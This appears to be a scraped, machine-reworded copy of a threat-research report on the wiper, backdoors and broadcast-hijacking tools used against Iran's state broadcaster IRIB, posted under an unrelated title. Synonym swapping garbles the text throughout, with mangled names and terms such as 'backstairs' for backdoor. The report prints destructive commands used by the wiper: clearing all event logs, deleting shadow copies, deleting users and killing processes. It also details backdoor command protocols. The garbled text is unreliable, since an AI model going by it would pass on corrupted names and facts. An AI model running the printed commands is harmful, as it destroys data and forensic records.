Home  ›  Vb Malicicous Script + Get Desktop Screenshot + Upload to Server

Vb Malicicous Script + Get Desktop Screenshot + Upload to Server

Written By Thursday, 14 April 2022 Add Comment Edit

EvilPlayout: Assault Against Iran's State Broadcaster

February xviii, 2022

In the by few months, a new wave of cyberattacks has been flooding Iran. These attacks are far from pocket-sized website defacements – the contempo wave is hit national infrastructure and causing major disruptions to public services.

This article provides an in-depth technical analysis of 1 of the attacks against the Iranian national media corporation, Islamic Commonwealth of Islamic republic of iran Dissemination (IRIB) which occurred in late January 2022.

Key findings

  • On January 27, Iranian state broadcaster IRIB became the bailiwick of a targeted cyberattack that resulted in several land-run TV channels dissemination footage of opposition leaders and calling for the assassination of the supreme leader. Check Point Research squad investigated this attack and was able to retrieve the files and forensics testify related to the incident from publicly available resource.
  • We establish malicious executables whose purpose was to air the protest message, in add-on, we discovered evidence that a wiper malware was used. This indicates that the attackers' aim was as well to disrupt the country'southward dissemination networks, with the damage to the TV and radio networks maybe more serious than officially reported.
  • Among the tools used in the attack, we identified malware that takes screenshots of the victims' screens, several custom-made backdoors, and related batch scripts and configuration files used to install and configure the malicious executables. We could not find any show that these tools were used previously, or aspect them to a specific threat actor.
  • In this article, we provide a technical assay of the tools related to the assault, equally well every bit the attackers' tactics.

Groundwork

Cyberattacks Hit Iran

In July 2021, an attack hit the Iranian national railway and cargo services, and acquired "unprecedented disruptions" to the country's trains. Just a mean solar day after, media outlets reported that the website of Islamic republic of iran'south Ministry of Roads and Urban Evolution, in charge of transportation, was taken down in a 'cyber disruption', preventing access to their official portal and sub-services. As if forcing railway employees to update the railroad train schedule manually – beyond all train stations – wasn't enough, the message displayed on the train schedule boards referred perplexed passengers to the Supreme Leader's office phone number. The previously unknown grouping called 'Predatory Sparrow' quickly claimed responsibleness for the attacks. Also that, Check Indicate Research investigated these attacks and the tools they deployed, and found similar tactics and techniques were used in previous operations against individual companies in Syria, linking all of those attacks to anti-regime group chosen Indra.

Since and then, cyber-attacks continue to striking national Iranian entities. Inspecting the targets, it appears that each one was carefully selected to ship a tailored message. In Baronial 2021, the hacktivist grouping Tapandegan, previously known for hacking and displaying protestation messages on the electronic flight arrival and departure boards in the Mashad and Tabriz international airports in 2018, released security camera footage from the Evin prison, a Tehran facility in which many political prisoners are held. The videos, which show prisoner abuse, were acquired by a grouping called Edalat-e Ali ('Ali's justice') in protest confronting man rights violations. In Oct 2021, every gas station in Iran was paralyzed past an attack that disrupted the electronic payment procedure. The incident led to extremely long queues at gas stations for two days and prevented customers from paying with the government-issued electronic cards used to buy subsidized fuel. When the carte du jour was swiped for payment, the Supreme Leader office telephone number appeared on the screen, taunting the highest ranking office in the regime still again. Iranian officials claimed that foreign actors, such as Israel and the United states, were behind the set on. All the same, Predatory Sparrow claimed responsibleness for this assail too.

In November 2021, Iranian airline Mahan Air appear that it foiled an attempted attack against its internal systems, with no harm done. Curiously, this time a grouping called 'Hooshyaran-e Vatan' (Vigilant of the Nation) claimed responsibility, and over the next two months published documents allegedly stolen in the hack that link the airline to the IRGC (Islamic Revolutionary Guard Corps).

Recently, on February 7, 2022, the Edalat-e Ali group released footage from closed-excursion cameras in another Iranian prison, Ghezel Hesar.

Figure 1 – Timeline of latest cyberattacks in Islamic republic of iran.

The Vocalization and Vision of the Islamic Republic of Islamic republic of iran

On Jan 27, only two weeks before the anniversary of the 1979 Islamic Revolution, reports were published that the IRIB, Islamic republic of iran's national broadcaster, was hacked. The Islamic Commonwealth of Iran Broadcasting, also called 'The Voice and Vision of the Islamic Republic of Islamic republic of iran', is a land-operated monopoly in charge of all radio and television services in Iran. The cyberattack resulted in state-run TV channels dissemination what was described by IRIB officials as "the faces and voices of hypocrites."

'Hypocrites' is a term used by the Iranian regime to refer to the Mujahedin-eastward-Khalq (MEK, as well called the People's Mujahedin of Islamic republic of iran), an exiled militant organization and the biggest political opposition grouping, which advocates overthrowing the current government and installing its own government, relying on an alternative interpretation of Islam. In the hijacked video, the faces of MEK leaders Maryam and Masoud Rajavi appeared, followed by the epitome of Ayatollah Khamenei crossed out with red lines and  the declaration "Salute to Rajavi, death to (Supreme Leader) Khamenei!." The deputy caput of technical diplomacy for IRIB, Reza Alidadi, stated that "only the owners of the engineering science in use by the corporation would have been able to bear out an attack relying on the organization features installed on the systems and the exploited backdoor." He further stated that similar attacks take hitting other state-operated radio channels.

Effigy 2 – Frame from the video with the opposition leaders' faces broadcast by state-run Iranian Goggle box channels equally a result of the cyber attack.

Although not the part of this investigation, it is worth mentioning that several days later, on Feb one, the web-based streaming platform of IRIB, Telewebion, was hijacked still once more to broadcast protest messages urging citizens to rise upwards against the Supreme Leader and stating that "the regime's foundations are rattling". Cleverly, the incident took place in the eye of a alive broadcast of the Islamic republic of iran-UAE soccer lucifer. This time, politically motivated group Edalat-e Ali, responsible for the attacks targeting prison facilities' security cameras, claimed responsibleness. This claim is plausible, as the video broadcast during the hack features the group'south logo on the peak left corner.

IRIB attack artifacts

According to Iranian country-run news network Akharin Khabar (Latest News), "the technical and dissemination systems are completely isolated, they are equipped with acceptable security protocols and are not accessible via the Internet." In the same post, it was reported that security forces associated with the authorities'due south state broadcasting network considered sabotage as the most likely scenario, with the Iranian officials calling the attack "extremely circuitous."

It is nevertheless not clear how the attackers gained initial access to these networks. We were able to retrieve only the files related to the later stages of these attacks, responsible for:

  • Establishing backdoors and their persistence.
  • Launching the "malicious" video or audio track.
  • Installing the wiper malware in an endeavour to disrupt operations in the hacked networks.

All of these samples were uploaded to VirusTotal (VT) from multiple sources, more often than not with Iranian IPs, and included short batch scripts that install or launch payloads, several forensics artifacts like Windows Event Log files or memory dumps, and the payloads themselves. The latter are generally .Internet executables, with no obfuscation simply a timestamped compilation date in the future. In add-on to having the same language and aforementioned VT submitters, these files likewise share other similarities, such equally PDB paths, mutual commands, names, code reuse, and general coding manner.

Hijacking circulate signals

From the MP4 video file that was used to interrupt the TV stream, and was uploaded to VT every bit TSE_90E11.mp4, nosotros were able to pin to other artifacts related to the broadcast hijacking, supposedly run on servers that broadcast Television programs (playouts). To play the video file, the attackers used a program chosen SimplePlayout.exe, a .Cyberspace-based executable compiled in debug fashion with the PDB path c:\work\SimplePlayout\obj\Debug\SimplePlayout.pdb. This executable has a single functionality: to play a video file in a loop using the .Cyberspace MPlatform SDK by Medialooks.

Effigy three – Function of the SimplePlayout lawmaking using MPlatform SDK to play the video file.

Offset, the SimplePlayout program looks for a configuration file called SimplePlayout.ini which contains two lines: the video file path, and a number representing the video format. The respective SimplePlayout.ini file uploaded together with SimplePlayout specifies the values that stand for to the MP4 file located at c:\windows\temp\TSE_90E11.mp4 and a video format of Hard disk 1080i with a refresh rate of 50 Hz.

To kill the video stream already playing, the attackers used a batch script called playjfalcfgcdq.bat. It kills the running process and deletes the executable of TFI Arista Playout Server, a software which the IRIB is known to use for broadcasting, and subsequently uninstalls the Matrox DSX driver, a part of the software for media processing in virtualized circulate infrastructures,

To combine all the malicious components, another script layoutabcpxtveni.bat does several things:

  • Renames the MP4 video file located at c:\windows\temp\TSE_90E11.003 to TSE_90E11.mp4. This file was probably dropped in that location by one of the backdoors, which we talk over afterwards.
  • Kills the running process of QTV.CG.Server.exe, perchance a office of Autocue QTV broadcasting software, and overwrites the original server located at D:\CG 1400\QTV.CG.Server.exe with SimplePlayout, the tool used by the attackers to play their video.
  • Copies c:\windows\SimplePlayout.exe to SimplePlayout.ini in the aforementioned directory where QTV.CG.Server.exe resides. At to the lowest degree this sample of the batch script contains a typo, equally the actors probably meant to copy SimplePlayout.ini next to the malicious executable.
  • Runs SimplePlayout.exe from both the initial and replaced locations.

In another prepare of related artifacts that we discovered, the attackers utilize the WAV file containing the 25 seconds audio track titled TSE_90E11.001, similar to the file name of the MP4 file used in the hijacked Tv set stream. An executable called Avar.exe is based on NAudio, an open-source .NET audio library, and  is responsible for playing the WAV file. Dissimilar the SimplePlayout.exe, Avar.exe does not rely on the configuration file. Instead, it contains the path to the WAV file hardcoded as C:\windows\temp\TSE_90E11.001. After it executes, Avar.exe attempts to enumerate through all active sound devices and play the WAV file on each one.

Finally, a batch script named avapweiguyyyw.bat puts the pieces together. Information technology kills a process called ava.exe and replaces the executable at C:\Program Files\MIT\AVA\ava.exe with Avar.exe. The apply of the name Ava in the files and folders might suggest that these files were intended for IRIB'south AVA radio, although the fact it was too impacted by this attack has non been confirmed officially.

The Wiper

We found two identical .Internet samples named msdskint.exe whose master purpose is to wipe the computer'southward files, drives, and MBR. This can also exist deduced from the PDB path: C:\work\wiper\Wiper\obj\Release\Wiper.pdb. In addition, the malware has the capability to clear Windows Event Logs, delete backups, impale processes, change users' passwords, and more. Both samples were uploaded to VT past the same submitters and in the same timeframe as the previously discussed artifacts.

Figure 4 – Overview of the wiper capabilities.

The wiper has iii modes to corrupt the files, and fills the bytes with random values:

  • default – Overwrite the get-go 200 bytes of each clamper of 1024 bytes in the file.
  • light-wipe – Overwrite a number of chunks specified in the configuration.
  • full_purge – Overwrite the entire file content.

The wiper gets its configuration for the wiping process in i of these means: in control-line arguments, or from the hardcoded default configuration and exclude list in the file <code>meciwipe.ini</lawmaking>. The default configuration contains a pre-divers list of exclusions related to Windows Os and Kaspersky and Symantec security products, which are widely used in Iran:

"-light-wipe", "3", "-stop-iis", "-logs", "-shadows", "-processes", "*sql", "-mbr", "-fork-bomb", "-wipe-all", "-wipe-stage-2", "-wipe-exclude", "C:\\\\Windows", "-wipe-exclude", "C:\\\\$Recycle.Bin", "-wipe-exclude", "C:\\\\$WinREAgent", "-wipe-exclude", "C:\\\\Config.Msi", "-wipe-exclude", "C:\\\\Recovery", "-wipe-exclude", "C:\\\\Program Files\\\\IBM\\\\*", "-wipe-exclude", "C:\\\\System Book Information", "-wipe-exclude", "C:\\\\Program Files\\\\Symantec*", "-wipe-exclude", "C:\\\\Program Files (x86)\\\\Symantec*", "-wipe-exclude", "C:\\\\Program Files\\\\Kaspersky*", "-wipe-exclude", "C:\\\\Program Files (x86)\\\\Kaspersky*", "-wipe-exclude", "C:\\\\Program Files\\\\Microsoft*", "-wipe-exclude", "C:\\\\Program Files (x86)\\\\Microsoft*", "-wipe-exclude", "C:\\\\Program Files\\\\Windows*", "-wipe-exclude", "C:\\\\Plan Files (x86)\\\\Windows*"

If the malware has no arguments, information technology runs as a service named "Service1".

The main wiper office computes the FNV1A32 hash of every statement and uses that to determine the action:

Arguments Options Action
"-mbr" Enable DestroyMBR flag
"-fork-flop" Start ii more instances of the wiper, with the "-fork-bomb" argument likewise
"-sessions" Impale other users sessions with the cmd commands: logoff {0} and rwinsta {0}
"-delete-users" file_path or list of users (* = all users) Delete the specified users using the cmd command: internet user {0} /delete
"-suspension-users" file_path or listing of users (* = all users) Interruption the specified users by changing their password to an 8-bytes random string appended with "aA1!"
"-logs" Delete events from Windows Event Log using the cmd control: for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"
"-passwords" None
"-shadows" Destroy shadow copies using the cmd command: echo delete shadows all > ane.south && diskshadow /s one.s && del 1.southward
"-start-iis" Beginning Internet Information Services (IIS) with iisreset /beginning
"-stop-iis" End Net Information Services (IIS) with iisreset /stop
"-config" file_path Read the arguments from the specified config file
"-calorie-free-wipe" size Corrupt only specified size of 1024-byte chunks in a file
"-wipe-exclude" listing of directories Add the directories that the wiper won't wipe
"-delete" Enable delete_files flag which means deleting the files after their corruption
"-processes" file_path or list of processes (* = all processes) Impale the specified processes using the cmd command: taskkill /PID {0} /f
"-wipe-stage-two" Enable wipe_stage_2 flag which means wiping the files by default method and so delete them
"-purge" Enable full_purge flag which means corrupting the whole file and not only chunks
"-wipe-simply" file_path or list of files Add a list of files to wipe
"-wipe-all" Wipe all the files with supported extensions

DestroyMBR flag enables the malware to wipe the MBR past writing a hardcoded base64-encoded binary to the file precg.exe and then running it. precg.exe is an MBRKiller based on the Gh0stRAT MBR wiper.

The main wiping procedure starts by searching for the last file that was wiped. The malware writes its path to the file named lastfile (or lastfile2 in the example of wipe_stage_2). Then, every file is checked to see if information technology is excluded or its extension is not in the predefined listing:
".accdb", ".cdx", ".dmp", ".h", ".js", ".pnf", ".rom", ".tif", ".wmdb", ".acl", ".cfg", ".md", ".hlp", ".json", ".png", ".rpt", ".tiff", ".wmv", ".acm", ".chk", ".docx", ".hpi", ".lnk", ".pps", ".rsp", ".tlb", ".xdr", ".amr", ".com", ".dot", ".htm", ".log", ".ppt", ".sam", ".tmp", ".xls", ".apln", ".cpl", ".drv", ".html", ".lst", ".pptx", ".scp", ".tsp", ".xlsx", ".asp", ".cpx", ".dwg", ".hxx", ".m4a", ".pro", ".scr", ".txt", ".xml", ".avi", ".dat", ".eml", ".ico", ".mid", ".psd", ".sdb", ".vbs", ".xsd", ".ax", ".db", ".exe", ".inc", ".nls", ".rar", ".sig", ".wab", ".nix", ".bak", ".dbf", ".ext", ".ini", ".one", ".rar", ".sql", ".wab~", ".bin", ".dbx", ".fdb", ".jar", ".pdf", ".rdf", ".sqlite", ".wav", ".bmp", ".dll", ".gif", ".jpg", ".pip", ".resources", ".theme", ".wma", ".config", ".mxf", ".mp3", ".mp4", ".cs", ".vb", ".tib", ".aspx", ".pem", ".crt", ".msg", ".mail service", ".enc", ".msi", ".cab", ".plb", ".plt"
The full_purge mode that overrides all the bytes of the file is e'er enabled for the files from <code>the purge_extensions</code> list:

".json", ".htm", ".log", ".html", ".lst", ".txt", ".xml", ".vbs", ".inc", ".ini", ".sql"

If the delete_files flag is enabled, the wiper also deletes the files after overwriting them.

We found boosted forensics artifacts, submitted together with the wiper samples, that prove that the wiper was indeed executed in a TV environment:

  • The lastfile2 containing the path to the last wiped file: C:\users\tpa\videos\captures\desktop.ini. This file is created only if the wiper was run in wipe_stage_2 mode, which deletes the files afterwards the wiping procedures.
  • The breakusufjkjdil.bat file, which shows that at least 1 instance of the wiper was supposed to run with the intent to kill existing user sessions and change passwords for all the users: "c:\windows\temp\msdskint.exe" -interruption-users * -sessions
  • The Event Viewer Application log file shows events related to the wiper service Service1. The logs contain a timestamp which is a few hours after the set on:

Effigy 5 – Windows Outcome Viewer logs shows the wiper execution in the Iranian Tv set surroundings.

Backdoors

WinScreeny

The name of this tool comes from the PDB path: C:\work\winscreeny\winscreeny\obj\Debug\winscreeny.pdb. The main purpose of the backdoor is to make screenshots of the victim'south estimator. Nosotros found two samples of this backstairs: the first one is the release version uploaded to VT with the name mslicval.exe, and the 2nd one is the debug version named precg2.exe. Needless to say, these files were submitted to VT together with the other artifacts that we discovered.

The backdoor tin exist run in different ways, based on the command-line argument:

  • None – Runs a SimpleTCPServer that listens on port 18000.
  • service – Runs every bit a service named Service1 . At start, the service creates a scheduled task with the control: schtasks /create /TN \"Microsoft\\Windows\\.Internet Framework\\.NETASM\"/TR \" <file_path> \" /ST <current_time + 1:x> /SC One time /F.
  • setup – Tries to proceeds privileges using the LsaAddAccountRights API function and then run itself as a service.

The malware listens for packets on port 18000, and for each packet, it checks if the message contains the scr= control sent with the POST method. If these conditions are met, the malware saves a screenshot to a file named screeny-<timestamp>.png and a "done" message is returned to the attacker if it succeeded.

Figure 6 – Winscreeny screenshot capture code.

Interestingly, the release version of this malware is likewise capable of command execution: information technology supports the s= command which gets a base64-encoded string XORed with 1-byte cardinal 0x24. The decoded string is run by cmd and the execution result is returned to the server. The code that handles this feature is also reused in the HttpService backstairs that we discuss later.

HttpCallbackService

HttpCallbackService is a Remote Administration Tool (RAT) with a familiar PDB path: C:\work\simpleserver\HttpCallbackService\obj\Release\HttpCallbackService.pdb. Its C&C URL tin can be specified in two dissimilar ways: a command-line argument or the configuration file callservice.ini. Next, the received value is appended with a curt string: ?yard= if the URL ends with ".aspx" or ".php"; m=, if the URL ends with "/", or /m= in any other instance.

Unfortunately, we didn't notice any configuration or other artifacts related to HttpCallbackService, and so the C&C server in this assail remains unknown.

Every v seconds, HttpCallbackService sends a request to the C&C URL using the webClient.DownloadString method to receive the listing of commands split by '\r\n'. If the malware doesn't receive any commands in the terminal 5 minutes and the isStayAliveMode flag is disabled, this time frame is increased to 1 minute.
These are the commands supported by the RAT:

Control Arguments Action
"upload" upload_path, base64-encoded content Upload a file to the victim'southward estimator. The server may transport the file in chunks, each of them sequentially decoded from base64 and appended to the file
"download" file name Download file from the victim's figurer to C&C server, the file is base-64 encoded and sent in chunks of 102400 bytes
"stay-alive" Enable isStayAliveMode flag and change the timer to 5 seconds
"cool-downwards" Disable the isStayAliveMode flag
Default command string Run the command in cmd and return the outcome to the C&C server

When the results of the commands are uploaded to the server, the data is sent to a slightly different URL: the C&C URL defined previously, now appended with "1". The data is sent using the WebClient.UploadValues method in the following format:

  • download=<file_name>\r\n--------------\r\n<base64 of chunk> for the download command
  • <control>\r\north--------------\r\due north<result> for the cmd command.

HttpService

HttpService is some other backdoor that listens on a specified port: it can be a command-line statement, the pre-defined port depending on the sample, or the value from the configuration file: <exe_name>.ini. Nosotros establish several samples with the default ports 19336, 19334, 19333, besides as two different configuration files uploaded to VT, with 19336 and 19335 values.

Each sample has a hardcoded version. The files that we discovered belong to iii different versions: 0.0.5, 0.0.11v4H and 0.0.15v4H. The version 0.0.5 listens to the specified port with a Simple TCP server, whereas 0.0.11v4H and 0.0.15v4H are based on the Simple HTTP Server. All of them use the HTML Agility Pack for HTML parsing and IonicZip library for pinch actions.

The highest version (0.0.15v4H) of the backstairs has multiple capabilities, including command execution and manipulation with the files.

Command execution: The command "cmd" makes the backdoor run the specified command with cmd.exe and return the outcome in this format: <div style='color: ruby'><result_string></div>. In addition, the backdoor can launch an interactive cmd trounce when information technology receives the "i=" command, whose arguments can be:

  • "ane" – Become the output from the shell and send information technology back to the C&C.
  • "2" – End the interactive beat out and clean up.
  • default – Decode and decrypt the XORed string and then run the command in the shell and save the output.

Similar to WinScreeny, the malware also has the "south=" command with the string XORed with 1-byte cardinal 0x24 every bit an argument. The decoded string is run by cmd.exe and the result is returned to the server.

Proxy connections: After the "p=" or "b=" control is received, the backdoor uses the victim's computer every bit a proxy to the URL it gets as an statement. The backdoor communicates with this URL, redirects the asking of the C&C server, and waits for a response to send it back to the C&C.

Download and upload files: The "f=" or "1=" control allows the backstairs to download a file from the path given as an argument or write a file given as an statement with the content of the message body. After it receives the "chiliad=" command, the malware writes the torso of the message to the path <base_directory><client_address>.out, reads data from <base_directory><client_address>.in, and sends it to the C&C. If the file does not exist, the malware creates the file and writes to information technology the current date and time.

Run SQL commands: The "con=" / "c=" command receives the SQL DB connectedness string and SQL query, and returns the result to the server.

Dispense the local files: The "<path>" command checks if the file/directory exists and and so does ane of these 3 things, based on the query value:

  • "nada" – Creates a aught file from the directory contents and returns it to the C&C.
  • "unzip" – Unzips the file using the path provided past the C&C.
  • "del" – Deletes the file.

Interestingly, in all 3 cases, the malware sends back the unabridged directory contents (including sub-directories) as an HTML page that contains the Nada, Unzip and Delete buttons, depending on the type of the file. This is how the interface looks on the attackers' side:

Figure 7 – HTML page with the directory list returned to the C&C server.

ServerLaunch dropper

The sample of HttpServer version 0.0.5 was submitted together with its dropper, chosen dwDrvInst.exe, which mimics the remote access software executable by DameWare. The tool'due south PDB path has the aforementioned pattern, C:\work\ServerLaunch\Release\ServerLaunch.pdb. However, the tool is written in C++, non .Cyberspace like all the others, and was compiled on December 2, 2021, almost 2 months prior to the attack.

ServerLaunch contains three executable in resources, which it drops to ionic.nothing.dll, httpservice2 and httpservice4, all in C:\Users\Public\. The malware and then starts both httpservice2 and httpservice4 with no arguments. Each of them has a unlike pre-defined port to listen on, which likely allows the attackers to ensure some sort of back-up of the C&C communication.

Connecting the files to the attack

We've discussed several unlike tools and some of artifacts related to their execution. It is clear that all these tools were created by the same actor and are connected. For case, the screenshot tool Winscreeny doesn't comprise the functionality to upload the created screenshots back to the attackers, which likely ways that it relies on other backdoors to perform this performance. The recurring Service1 proper name for all the tools indicates that different backdoors, if running on the aforementioned machine were mostly executed with command-line arguments or provided configuration files.

Taking into account that the samples are related to each other, we can substantiate the connection between these files and the IRIB cyberattack:

  • The whole cluster of activity is interconnected and was submitted to VT generally from Iranian IPs all at the same timeframe, likely by incident responders.
  • The audio and video files utilized past the tools are the same as those broadcast live on hacked Iranian TV. The Twitter business relationship @GhyamSarnegouni ("Uprising to overflow") featured in this video contains a few recordings of different Telly channels streams that feature both the video and the sound tracks we've discussed.
  • Multiple artifacts such every bit Matrox DSX, Autocue QTV, TFI Arista Playout Server, etc. that were referenced in the samples indicate that these files were intended for a circulate environment.
  • Among the forensics artifacts submitted together with video and executables, nosotros discovered Windows Upshot Viewer files that incorporate evidence that the samples were attempted to exist executed in the Iranian Television network environs, a domain not resolved publicly. The timestamp of these specific logs is subsequently the time of the actual incident.

Effigy viii – Screenshot of the Application log that contains the wiper execution evidence.

  • Numerous other forensics evidence from this VT file cluster contains other artifacts directly related to IRIB. For example, an internal tool called MIT_FreeSizeService (md5:307e7440a15c8eed720566f067a2e96b) bears the IRIB logo, and the memory dump of the MetaSAN software called executable.4504.exe (md5:1fc57ccec4668bbcbebaa9c734a437ba) features memory strings that indicate the software was run on the machine from the MIT-Idiot box domain.

Figure 9 – VT submission of the unknown tool featuring the MIT (same every bit the domain name) cord and containing the IRIB logo

Attribution

Iranian officials appear to be confident that MEK is behind this attack, with the deputy head of technical affairs for Islamic Republic of Iran Broadcasting claiming the same. However, the opposition group itself denies any involvement, stating that "the grouping had get aware of the incident just when it happened but that the hacking might have been the work of supporters in Iran."

The hacktivist grouping Predatory Sparrow, which claimed responsibleness for the attacks against the national railway services, the transportation ministry building, and the Iranian gas stations, affiliated itself with the IRIB assail via its Telegram aqueduct. On the morning before the attack, they wrote "Wait for the proficient news from our team. Do not switch the channel." Later on the same evening, they posted a video from one of the disrupted TV channels, introducing it equally a "cyber-attack on the country's radio and telly arrangement by the Predatory Sparrow squad." Currently, no technical proof of the grouping's attribution to the set on has been discovered. The video displayed on the channel is available online and refers to a different Telegram account @GhyamSarnegouni, so the claims should be treated with caution.

Figure 10 – Posts from 'Predatory Sparrow's Telegram channel, in which the group claims responsibility for the set on.

Conclusion

In this commodity, nosotros analyzed a set of tools that likely was used in a cyberattack against the IRIB, which disrupted several state-run TV and radio channels. The apply of wiper malware in the attack against a land entity in Iran begs us to compare the tools with those belonging to Indra, who, among other attacks, is responsible for unleashing a wiper in the Iranian Railways and Ministry of Roads systems. Although these wipers are coded and deport very differently, some implementation details such equally execution based on batch files, or the password changing patterns ([random sequence]aA1! for this attack and Aa153![random sequence] in Indra's instance), suggests that the attackers behind the IRIB hack may have been inspired past previous attacks happened in Iran.

As in the example with Indra, information technology appears that the actor may have many capabilities that accept all the same to be explored. On the one paw, the attackers managed to pull off a complicated operation to bypass security systems and network division, penetrate the broadcaster'due south networks, produce and run the malicious tools that heavily rely on internal knowledge of the dissemination software used past victims, all while staying nether the radar during the reconnaissance and initial intrusion stages.

On the other hand, the attackers' tools are of relatively low quality and composure, and are launched by clumsy and sometimes buggy 3-line batch scripts. This might back up the theory that the attackers might accept had assist from inside the IRIB, or indicate a yet unknown collaboration between different groups with different skills.

Meanwhile, virtually ii weeks after the assault happened, MEK-affiliated news published a condition study of the assail claiming that the "regime's radio and TV networks have not returned to a normal status" and provided an elaborate list of affected devices with the argument "more than 600 servers, advanced digital production, archiving, and broadcasting of radio and television equipment have been destroyed, and their software has been damaged." In that location is no way for the states to verify these claims, but if at least some of them are true, the extent of devastation acquired by the wiper and other malicious tools that we've discovered (and those that are notwithstanding unknown), exceeded expectations.

IOCs

Attack files:

hash name description
1607f31ac66dfec739dc675ade921582acb8446c2ac7d6d1bc65a3e993fc5b54 msdskint.exe Wiper
42ed646eed4f949c456c637a222e7d94dd8ac67ed5ebda5e63c7b7979076d9cf msdskint.exe Wiper
8bdf6e262966a59a7242d279e511dd694467f07d1d76c456a0c26d0db2ec48a8 HttpService2.exe HttpService
427c105859c3dc62ece790e41a42b0f6ae587496a07d3bd190143179cdf6c6bd HttpService4.exe HttpService
e3d61cbbfbe41295dd52acff388d1d8b1d414a143d77def4221fd885aae6cd83 HttpService2.exe HttpService
096bae94e09059e2e3106503353b1b4f7116fa667600ca2ab3fa7591708e645a HttpService4.exe HttpService
13a016b8f502c81e172c09114f25e4d8a8632768aefd56c5f6d147e9b6466216 HttpService4.exe HttpService
ea740894227ae1df923997edb7bda3a00f523fbff7cc02d3b5e6b3de19d672fc HttpCallbackService.exe HttpCallbackService
62b692be251feb63af2723a68975976b749cab20014ffaa6488af80f4f03e0a1 dwDrvInst.exe ServerLaunch
41e0c19cd6a66b4c48cc693fd4be96733bc8ccbe91f7d92031d08ed7ff69759a precg2.exe Winscreeny
e9e4a8650094e4de6e5d748f7bc6f605c23090d076338f437a9a70ced4a9382d mslicval.exe Winscreeny
d788ebc7ee98c222f46d7ca2347027643784a78b5954c9a31734ec1b197bc2aa Avar.exe Avar
1155dd06e0b108bde3addcdbd5d1da4dc18ca245c39ce7d967f8971eb0f88dbb SimplePlayout.exe SimplePlayout
a25215c9adce51a3ecfe34c802d3e7d865cf410ddbe10101e3b41f6ba11347a4 TSE_90E11.mp4 MP4 video file
4cc21810d786dca94e01d0714d37e3f097ff6e3813bf6e17a9bd86cd9a4ceb2b TSE_90E11.001 WAV file
7ea7b20b87ded3c297ec0890ee8a396427d70caf983b42f479d8fad38629b684 playoutabcpxtveni.bat
bc8de80a28c8ae55415ccdfece270f6548f067fc2a00e799baf0279d4d560807 breakusufjkjdil.bat
197f13580ec249fa84b1e54f978c5cab60f22561a2fab2ff60bdb2d5bfa25512 avapweiguyyyw.bat
efc8f12c53d1730fa8ac00cfa60e63ab43d90f42879ef69d7f6fb9978246f9cb playjfalcfgcdq.bat
a2d493c2cb25fc03f5d31cf3023b473d71d38b972eccdb7873f50d2344ea7753 simpleplayout.ini
c305b3cb96a34258a3e702526de6548b2de99449c0839a9aea518accc7c861ab 436748-HttpService4.exe.ini
8b74c08c33cd8a0cc1eaf822caeaad6b54bc39e4839e575f3c0ece4bb8992408 436751-HttpService4_2.exe.ini

Forensics artifacts:

hash proper noun description
0daa0aefdc6d0641eb06e62bc8c92a0696aa8089258cb2d3552ac137d53237ec sec.evtx security consequence log from 1 of the machines
a3b9bd57e6b281610e570be87883d907992bdf7be3bcd37885ee2cf97d930cd3 application.evtx applications event log from i of the machines
067ae6ecfd108a79a32eb1a76a262868d8f3a9a7924b26091f0e2229152bdd9d lastfile2 path to the terminal file wiped and deleted by the wiper

furphyfifixt.blogspot.com

Source: https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/

0 Response to "Vb Malicicous Script + Get Desktop Screenshot + Upload to Server"

Post a Comment

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel